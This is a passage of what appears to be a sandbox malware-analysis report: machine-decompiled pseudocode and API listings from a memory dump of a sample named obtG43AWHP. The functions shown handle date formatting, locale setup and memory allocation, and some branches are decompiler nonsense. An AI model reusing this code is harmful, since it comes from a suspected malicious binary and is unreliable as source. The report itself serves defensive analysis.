												if(__eflags == 0) {
													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
												} else {
													__eax = __eax - 1;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__ebp + 8);
														__eax =  *0x454684; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													} else {
														__eax =  *(__ebp + 8);
														__eax =  *0x454688; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													}
												}
											}
										}
										goto L109;
									case 6:
										L33:
										__eax = E00408974(__ebp);
										__eax = E004089D8(__ebp);
										 *(__ebp - 0x1f) = 0;
										__esi =  *(__ebp - 4);
										while(1) {
											L52:
											__al =  *__esi;
											__eflags =  *__esi;
											if( *__esi == 0) {
												break;
											}
											L34:
											__eax = __eax & 0x000000ff;
											__eflags = __eax;
											asm("bt [0x419108], eax");
											if(__eax >= 0) {
												L36:
												__eax = 0;
												__al =  *__esi;
												__eflags = 0 - 0x48;
												if(0 > 0x48) {
													L42:
													__eax = 0xffffffffffffff9f;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														L45:
														__eflags =  *(__ebp - 0x1f);
														if( *(__ebp - 0x1f) != 0) {
															L51:
															__esi = __esi + 1;
															__eflags = __esi;
															continue;
														}
														L46:
														__edx = 0x409418;
														__ecx = 5;
														__eax = __esi;
														__eax = E004077C0(__esi, 5, 0x409418);
														__eflags = __eax;
														if(__eax == 0) {
															L49:
															 *((char*)(__ebp - 0x1e)) = 1;
															break;
														}
														L47:
														__edx = 0x409420;
														__ecx = 3;
														__eax = __esi;
														__eax = E004077C0(__esi, 3, 0x409420);
														__eflags = __eax;
														if(__eax == 0) {
															goto L49;
														}
														L48:
														__edx = 0x409424;
														__ecx = 4;
														__eax = __esi;
														__eax = E004077C0(__esi, 4, 0x409424);
														__eflags = __eax;
														if(__eax != 0) {
															break;
														}
														goto L49;
													}
													L43:
													__eax = 0xffffffffffffff98;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														break;
													}
													L44:
													goto L51;
												}
												L37:
												if(0 == 0x48) {
													break;
												}
												L38:
												__eax = 0xffffffffffffffde;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													L50:
													__al =  *(__ebp - 0x1f);
													__al =  *(__ebp - 0x1f) ^ 0x00000001;
													__eflags = __al;
													 *(__ebp - 0x1f) = __al;
													goto L51;
												}
												L39:
												__eax = 0xffffffffffffffd9;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L50;
												}
												L40:
												__eax = 0xffffffffffffffbf;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L45;
												}
												L41:
												goto L51;
											} else {
												__eax = __esi;
												__eax = E0040B044(__esi);
												__esi = __eax;
												continue;
											}
										}
										L53:
										__ax =  *((intOrPtr*)(__ebp - 0x16));
										__eflags =  *((char*)(__ebp - 0x1e));
										if( *((char*)(__ebp - 0x1e)) != 0) {
											__eflags = __ax;
											if(__ax != 0) {
												__eflags = __ax - 0xc;
												if(__ax > 0xc) {
													__ax = __ax - 0xc;
													__eflags = __ax;
												}
											} else {
												__ax = 0xc;
											}
										}
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__edx =  *(__ebp + 8);
										__eax = __ax & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 7:
										L61:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x18) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 8:
										L64:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 9:
										L67:
										__eax = E00408974(__ebp);
										__eflags =  *(__ebp - 0xc) - 1;
										if( *(__ebp - 0xc) != 1) {
											__eax =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										} else {
											__eax =  *(__ebp + 8);
											__eax =  *0x454698; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										}
										goto L109;
									case 0xa:
										L70:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 3;
										if( *(__ebp - 0xc) > 3) {
											 *(__ebp - 0xc) = 3;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 0xb:
										goto L0;
									case 0xc:
										L90:
										E00408974(__ebp) =  *(__ebp + 8);
										__eax =  *0x454684; // 0x0
										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										__eax = E004089D8(__ebp);
										__eflags =  *((short*)(__ebp - 0x16));
										if( *((short*)(__ebp - 0x16)) != 0) {
											L93:
											 *(__ebp + 8) = 0x409438;
											__edx = 1;
											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
											goto L109;
										}
										L91:
										__eflags =  *(__ebp - 0x18);
										if( *(__ebp - 0x18) != 0) {
											goto L93;
										}
										L92:
										__eflags =  *(__ebp - 0x1a);
										if( *(__ebp - 0x1a) == 0) {
											goto L109;
										}
										goto L93;
									case 0xd:
										L94:
										__eflags =  *0x454681;
										__eflags = __eax - 0x454681;
										 *__edi =  *__edi + __cl;
										__eflags =  *(__ecx - 0x75000000) & __bl;
									case 0xe:
										L97:
										__eflags =  *0x45468c;
										__eflags = __eax - 0x45468c;
										_t136 = __edi + __esi * 2 - 0x75;
										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
										__eflags =  *_t136;
									case 0xf:
										L100:
										__esi =  *(__ebp - 4);
										while(1) {
											L104:
											__eax =  *(__ebp - 4);
											__al =  *__eax;
											__eflags = __al;
											if(__al == 0) {
												break;
											}
											L105:
											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
												L101:
												__eax = __eax & 0x000000ff;
												__eflags = __eax;
												asm("bt [0x419108], eax");
												if(__eax >= 0) {
													_t146 = __ebp - 4;
													 *_t146 =  *(__ebp - 4) + 1;
													__eflags =  *_t146;
												} else {
													__eax =  *(__ebp - 4);
													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
												}
												continue;
											}
											break;
										}
										L106:
										__eax =  *(__ebp + 8);
										__edx =  *(__ebp - 4);
										__edx =  *(__ebp - 4) - __esi;
										__esi = E004088C4(__edx,  *(__ebp + 8));
										__eax =  *(__ebp - 4);
										__eflags =  *__eax;
										if( *__eax != 0) {
											 *(__ebp - 4) =  *(__ebp - 4) + 1;
										}
										goto L109;
								}
							} else {
								__eflags = _t181 - 0x4d;
								if(_t181 == 0x4d) {
									__eflags = _t232 - 0x48;
									if(_t232 == 0x48) {
										_t181 = 0x4e;
									}
								}
								L9:
								_t232 = _t181;
								goto L10;
							}
						} else {
							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t232 = 0x20;
							continue;
						}
					}
					L110:
					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
					_pop(_t272);
					 *[fs:eax] = _t272;
					_push(E00409410);
					return E00403EAC(_t282 - 0x28, 2);
				}
			}

















    0x00409161
    0x00409161
    0x00409161
    0x00409162
    0x0040916b
    0x0040917f
    0x004091b5
    0x004091ba
    0x004091bc
    0x004091f2
    0x004091f7
    0x004091f9
    0x0040923b
    0x00409240
    0x00409242
    0x00409282
    0x00409287
    0x00409289
    0x004092c9
    0x0040928b
    0x0040928c
    0x00409291
    0x004092ae
    0x004092b4
    0x004092b4
    0x00409244
    0x00409245
    0x0040924a
    0x00409267
    0x0040926d
    0x0040926d
    0x004091fb
    0x004091fb
    0x00409200
    0x00409217
    0x0040921c
    0x00409202
    0x00409206
    0x0040920b
    0x00409210
    0x00409222
    0x00409226
    0x00409226
    0x004091be
    0x004091be
    0x004091c3
    0x004091c5
    0x004091c5
    0x004091d3
    0x004091d9
    0x004091dd
    0x004091dd
    0x00409181
    0x00409181
    0x00409186
    0x00409188
    0x00409188
    0x00409188
    0x0040918b
    0x0040918f
    0x00409194
    0x00409196
    0x0040919c
    0x004091a0
    0x004091a0
    0x004093d8
    0x004093d8
    0x004093db
    0x004093df
    0x00000000
    0x00000000
    0x00408cdf
    0x00408cdf
    0x00408cea
    0x00408cf1
    0x00408d24
    0x00408d27
    0x00408d2f
    0x00408d32
    0x00408d34
    0x00408d34
    0x00408d34
    0x00408d36
    0x00408d3b
    0x00408d3e
    0x00408d4d
    0x00408d52
    0x00408d55
    0x00408d58
    0x004093c6
    0x004093d2
    0x00000000
    0x004093d7
    0x00408d5e
    0x00408d64
    0x00000000
    0x00000000
    0x00000000
    0x00408de4
    0x00408de5
    0x00408dec
    0x00408df2
    0x00408df6
    0x00408e28
    0x00408df8
    0x00408e10
    0x00408e15
    0x00000000
    0x00000000
    0x00408e33
    0x00408e3b
    0x00408e41
    0x00408e46
    0x00408e4c
    0x00408e52
    0x00408e55
    0x00000000
    0x00000000
    0x00408e60
    0x00408e68
    0x00408e6e
    0x00408e73
    0x00408e79
    0x00408e7f
    0x00408e82
    0x00000000
    0x00000000
    0x00408e8d
    0x00408e95
    0x00408e9e
    0x00408e9f
    0x00408e9f
    0x00408ea2
    0x00408ea8
    0x00408eac
    0x00408eb0
    0x00408eb3
    0x00408ea4
    0x00408ea4
    0x00408ec2
    0x00408ec6
    0x00408ecd
    0x00408ea6
    0x00408edc
    0x00408ee0
    0x00408ee7
    0x00408eec
    0x00408ea4
    0x00000000
    0x00000000
    0x00408ef2
    0x00408ef9
    0x00408efc
    0x00408efd
    0x00408efd
    0x00408f00
    0x00408f13
    0x00408f17
    0x00408f1b
    0x00408f1e
    0x00408f02
    0x00408f02
    0x00408f3b
    0x00408f3e
    0x00408f45
    0x00408f04
    0x00408f04
    0x00408f04
    0x00408f05
    0x00408f62
    0x00408f65
    0x00408f6c
    0x00408f07
    0x00408f07
    0x00408f07
    0x00408f08
    0x00408f77
    0x00408f7b
    0x00408f80
    0x00408f0a
    0x00408f8b
    0x00408f8f
    0x00408f94
    0x00408f99
    0x00408f08
    0x00408f05
    0x00408f02
    0x00000000
    0x00000000
    0x00408f9f
    0x00408fa0
    0x00408fa7
    0x00408fad
    0x00408fb1
    0x0040904e
    0x0040904e
    0x0040904e
    0x00409050
    0x00409052
    0x00000000
    0x00000000
    0x00408fb9
    0x00408fb9
    0x00408fb9
    0x00408fbe
    0x00408fc5
    0x00408fd2
    0x00408fd2
    0x00408fd4
    0x00408fd6
    0x00408fd9
    0x00408fee
    0x00408fee
    0x00408fee
    0x00408ff1
    0x00408ffa
    0x00408ffa
    0x00408ffe
    0x0040904d
    0x0040904d
    0x0040904d
    0x00000000
    0x0040904d
    0x00409000
    0x00409000
    0x00409005
    0x0040900a
    0x0040900c
    0x00409011
    0x00409013
    0x0040903f
    0x0040903f
    0x00000000
    0x0040903f
    0x00409015
    0x00409015
    0x0040901a
    0x0040901f
    0x00409021
    0x00409026
    0x00409028
    0x00000000
    0x00000000
    0x0040902a
    0x0040902a
    0x0040902f
    0x00409034
    0x00409036
    0x0040903b
    0x0040903d
    0x00000000
    0x00000000
    0x00000000
    0x0040903d
    0x00408ff3
    0x00408ff3
    0x00408ff3
    0x00408ff6
    0x00000000
    0x00000000
    0x00408ff8
    0x00000000
    0x00408ff8
    0x00408fdb
    0x00408fdb
    0x00000000
    0x00000000
    0x00408fdd
    0x00408fdd
    0x00408fdd
    0x00408fe0
    0x00409045
    0x00409045
    0x00409048
    0x00409048
    0x0040904a
    0x00000000
    0x0040904a
    0x00408fe2
    0x00408fe2
    0x00408fe2
    0x00408fe5
    0x00000000
    0x00000000
    0x00408fe7
    0x00408fe7
    0x00408fe7
    0x00408fea
    0x00000000
    0x00000000
    0x00408fec
    0x00000000
    0x00408fc7
    0x00408fc7
    0x00408fc9
    0x00408fce
    0x00000000
    0x00408fce
    0x00408fc5
    0x00409058
    0x00409058
    0x0040905c
    0x00409060
    0x00409062
    0x00409065
    0x0040906d
    0x00409071
    0x00409073
    0x00409073
    0x00409073
    0x00409067
    0x00409067
    0x00409067
    0x00409065
    0x00409077
    0x0040907b
    0x0040907d
    0x0040907d
    0x00409084
    0x00409088
    0x0040908b
    0x0040908e
    0x00000000
    0x00000000
    0x00409099
    0x004090a1
    0x004090a7
    0x004090ab
    0x004090ad
    0x004090ad
    0x004090b4
    0x004090b8
    0x004090bc
    0x004090bf
    0x00000000
    0x00000000
    0x004090ca
    0x004090d2
    0x004090d8
    0x004090dc
    0x004090de
    0x004090de
    0x004090e5
    0x004090e9
    0x004090ed
    0x004090f0
    0x00000000
    0x00000000
    0x004090fb
    0x004090fc
    0x00409102
    0x00409106
    0x0040911c
    0x00409120
    0x00409125
    0x00409108
    0x00409108
    0x0040910c
    0x00409111
    0x00409116
    0x00000000
    0x00000000
    0x00409130
    0x00409138
    0x0040913e
    0x00409142
    0x00409144
    0x00409144
    0x0040914b
    0x0040914f
    0x00409153
    0x00409156
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004092d4
    0x004092db
    0x004092df
    0x004092e4
    0x004092eb
    0x004092f1
    0x004092f6
    0x0040930a
    0x0040930e
    0x00409313
    0x0040931e
    0x00409322
    0x00409327
    0x00000000
    0x0040932c
    0x004092f8
    0x004092f8
    0x004092fd
    0x00000000
    0x00000000
    0x004092ff
    0x004092ff
    0x00409304
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00409332
    0x00409332
    0x00409333
    0x00409338
    0x0040933a
    0x00000000
    0x00409358
    0x00409358
    0x00409359
    0x0040935e
    0x0040935e
    0x0040935e
    0x00000000
    0x00409377
    0x00409377
    0x0040939a
    0x0040939a
    0x0040939a
    0x0040939d
    0x0040939f
    0x004093a1
    0x00000000
    0x00000000
    0x004093a3
    0x004093a3
    0x004093a6
    0x0040937c
    0x0040937c
    0x0040937c
    0x00409381
    0x00409388
    0x00409397
    0x00409397
    0x00409397
    0x0040938a
    0x0040938a
    0x00409392
    0x00409392
    0x00000000
    0x00409388
    0x00000000
    0x004093a6
    0x004093a8
    0x004093a8
    0x004093ac
    0x004093af
    0x004093b3
    0x004093b9
    0x004093bc
    0x004093bf
    0x004093c1
    0x004093c1
    0x00000000
    0x00000000
    0x00408d40
    0x00408d40
    0x00408d42
    0x00408d44
    0x00408d47
    0x00408d49
    0x00408d49
    0x00408d47
    0x00408d4b
    0x00408d4b
    0x00000000
    0x00408d4b
    0x00408cf3
    0x00408d04
    0x00408d12
    0x00408d15
    0x00000000
    0x00408d15
    0x00408cf1
    0x004093e5
    0x004093e8
    0x004093f0
    0x004093f3
    0x004093f6
    0x00409408
    0x00409408

    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040D920, Relevance: 6.1, APIs: 4, Instructions: 115
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040C9FC();
							E0040D7EC(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040CA04();
							E0040D7EC(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0040D8C4(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0040D894(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040CA0C();
						E0040D7EC(_v780);
						E0040DB18(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040C598();
				return E0040D7EC(_v776);
			}






















    0x0040d92c
    0x0040d93c
    0x0040d943
    0x0040d943
    0x0040d94e
    0x0040d95c
    0x0040d96b
    0x0040d989
    0x0040d96d
    0x0040d978
    0x0040d978
    0x0040d998
    0x0040d9a4
    0x0040d9a7
    0x0040d9a9
    0x0040d9aa
    0x0040d9ac
    0x0040d9b2
    0x0040d9b4
    0x0040d9c3
    0x0040d9c4
    0x0040d9ce
    0x0040d9cf
    0x0040d9d4
    0x0040d9df
    0x0040d9e0
    0x0040d9ea
    0x0040d9eb
    0x0040d9f0
    0x0040da0b
    0x0040da0d
    0x0040da0e
    0x0040da11
    0x0040da11
    0x0040d9b2
    0x0040da1a
    0x0040da1d
    0x0040da1f
    0x0040da20
    0x0040da26
    0x0040da2c
    0x0040da2e
    0x0040da30
    0x0040da33
    0x0040da36
    0x0040da36
    0x0040da39
    0x00000000
    0x00000000
    0x00000000
    0x0040da39
    0x0040da39
    0x0040da40
    0x0040da4b
    0x0040da53
    0x0040da5a
    0x0040da61
    0x0040da62
    0x0040da67
    0x0040da72
    0x0040da72
    0x0040da80
    0x0040da84
    0x0040da8a
    0x0040da8b
    0x0040da9b

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040B3A0, Relevance: 6.1, APIs: 4, Instructions: 95
    C-Code - Quality: 100%
    			E0040B3A0() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x454738 = 0x409;
				 *0x45473c = 9;
				 *0x454740 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x454738 = _t14;
				}
				if(_t14 != 0) {
					 *0x45473c = _t14 & 0x3ff;
					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x419108, 0x40b4f4, 8 << 2);
				if( *0x4190c0 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x454744 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040B328(__eflags, _t49);
					}
				} else {
					_t20 = E0040B388();
					if(_t20 != 0) {
						 *0x454745 = 0;
						 *0x454744 = 0;
						return _t20;
					}
					E0040B328(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x454744 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x454745 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x454738; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x454745 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















    0x0040b3ac
    0x0040b3b6
    0x0040b3c0
    0x0040b3ca
    0x0040b3d1
    0x0040b3d3
    0x0040b3d3
    0x0040b3db
    0x0040b3e7
    0x0040b3f3
    0x0040b3f3
    0x0040b407
    0x0040b410
    0x0040b4bf
    0x0040b4c4
    0x0040b4c9
    0x0040b4d0
    0x0040b4d5
    0x0040b4d7
    0x0040b4da
    0x0040b4e0
    0x0040b4e2
    0x00000000
    0x0040b4ea
    0x0040b416
    0x0040b416
    0x0040b41d
    0x0040b41f
    0x0040b426
    0x00000000
    0x0040b426
    0x0040b433
    0x0040b443
    0x0040b445
    0x0040b44a
    0x0040b44d
    0x0040b453
    0x0040b455
    0x0040b457
    0x00000000
    0x0040b457
    0x0040b463
    0x0040b468
    0x0040b46e
    0x0040b46e
    0x0040b470
    0x0040b471
    0x0040b472
    0x0040b472
    0x0040b48e
    0x0040b494
    0x0040b499
    0x0040b49e
    0x0040b4a4
    0x0040b4a4
    0x0040b4a8
    0x0040b4ab
    0x0040b4b1
    0x0040b4b3
    0x00000000
    0x00000000
    0x0040b4b5
    0x0040b4b8
    0x0040b4b8
    0x0040b4b9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040b4b9
    0x0040b4a4
    0x0040b4f1
    0x0040b4f1
    0x00000000

    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040152C, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E0040137C(0x4545e4, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









    0x00401530
    0x00401532
    0x00401534
    0x00401536
    0x0040154a
    0x0040154f
    0x00401551
    0x00401555
    0x0040155d
    0x00401563
    0x0040156f
    0x00401574
    0x00401574
    0x00401579
    0x00401582
    0x00401589
    0x00401595
    0x0040159c
    0x00000000
    0x0040159c
    0x00401589
    0x004015a2

    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00405E00, Relevance: 6.0, APIs: 4, Instructions: 11
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





    0x00405e03
    0x00405e0a
    0x00405e0f
    0x00405e15
    0x00405e1a

    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00408B80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x408c5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00403E88(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00403F20( &_v8, 0x408c80);
				} else {
					E00403F20( &_v8, 0x408c74);
				}
				_t32 = E00404348(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E004040F8(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E00408C65);
				return E00403E88( &_v8);
			}













    0x00408b8d
    0x00408b90
    0x00408b92
    0x00408b96
    0x00408b97
    0x00408b9c
    0x00408b9f
    0x00408ba4
    0x00408bb0
    0x00408bbb
    0x00408bc6
    0x00408bcd
    0x00408be6
    0x00408bcf
    0x00408bd7
    0x00408bd7
    0x00408bfa
    0x00408c13
    0x00408c22
    0x00408c28
    0x00408c43
    0x00408c43
    0x00408c28
    0x00408c4a
    0x00408c4d
    0x00408c50
    0x00408c5d

    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
